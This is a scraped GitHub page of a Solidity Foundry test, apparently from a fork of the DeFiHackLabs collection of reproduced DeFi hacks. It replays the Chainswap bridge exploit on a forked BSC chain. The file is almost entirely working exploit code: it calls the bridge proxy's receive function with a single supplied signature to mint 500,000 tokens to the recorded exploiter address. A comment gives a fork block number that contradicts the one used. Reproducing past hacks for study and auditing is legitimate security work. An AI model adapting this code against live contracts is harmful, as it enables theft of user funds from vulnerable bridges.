forked from SunWeb3Sec/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Chainswap_exp2.sol
53 lines (44 loc) · 1.68 KB
/
Chainswap_exp2.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity >=0.7.0 <0.9.0;
import "forge-std/Test.sol";
import "./../interface.sol";
struct Signature {
address signatory;
uint8 v;
bytes32 r;
bytes32 s;
}
// interface IChainswap {
// function receive(uint256 fromChainId, address to, uint256 nonce, uint256 volume, Signature[] memory signatures) virtual external payable;
// }
contract ContractTest is Test {
address exploiter = 0xEda5066780dE29D00dfb54581A707ef6F52D8113;
address proxy = 0x089165ac9a7Bf61833Da86268F34A01652543466;
address impl = 0xc5185d2c68aAa7c5f0921948f8135d01510D647F;
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
function setUp() public {
cheats.createSelectFork("bsc", 9_042_274); // fork mainnet at block 13125070
}
function testExploit() public {
// https://bscscan.com/tx/0x83b4adaf73ad34c5c53aa9b805579ed74bc1391c5297201e6457cde709dff723
Signature[] memory sigs = new Signature[](1);
sigs[0] = Signature({
signatory: 0xF1790Ac4900F761F677107de65CE6Ed65f952A7c,
v: 28,
r: 0x961afd291dbcec7dc1b0fa28f989f805fe1acdb18fcf2369d434710cde4c03ac,
s: 0x39884d4ef7e88e9b70b0135fca3dd2a97e806ead11e38aa6e75f550724962910
});
proxy.call(
abi.encodeWithSignature(
"receive(uint256,address,uint256,uint256, Signature[])",
1,
exploiter,
0,
500_000_000_000_000_000_000_000,
sigs
)
);
}
receive() external payable {}
}